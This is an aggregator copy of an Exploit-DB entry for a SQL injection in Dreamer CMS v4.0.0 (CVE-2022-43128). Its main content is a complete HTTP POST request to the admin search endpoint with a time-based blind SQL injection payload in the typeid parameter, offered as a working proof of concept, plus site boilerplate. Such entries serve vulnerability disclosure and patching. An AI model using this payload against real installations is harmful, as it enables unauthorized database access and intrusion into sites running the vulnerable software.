5

[webapps] Dreamer CMS v4.0.0 - SQL Injection

 1 year ago
source link: https://www.exploit-db.com/exploits/51134
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Dreamer CMS v4.0.0 - SQL Injection

EDB-ID:

51134

EDB Verified:

Exploit:

  /  

Platform:

Multiple

Date:

2023-03-30

Vulnerable App:

# Exploit Title: Dreamer CMS v4.0.0 - SQL Injection
# Date: 2022/10/02 
# Exploit Author: lvren
# Vendor Homepage: http://cms.iteachyou.cc/
# Software Link: https://gitee.com/isoftforce/dreamer_cms/repository/archive/v4.0.0.zip 
# Version: v4.0.0 
# CVE: CVE-2022-43128

Proof Of Concept:

POST /admin/search/doSearch HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://localhost:8888
Connection: close
Referer: http://localhost:8888/admin/search/doSearch
Cookie: dreamer-cms-s=6387e44f-e700-462d-bba5-d4e0ffff5739
Upgrade-Insecure-Requests: 1

entity[typeid']=1) AND (SELECT 2904 FROM (SELECT(SLEEP(5)))TdVL) AND (5386=5386



lvren
[email protected]

签名由 网易灵犀办公 定制

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK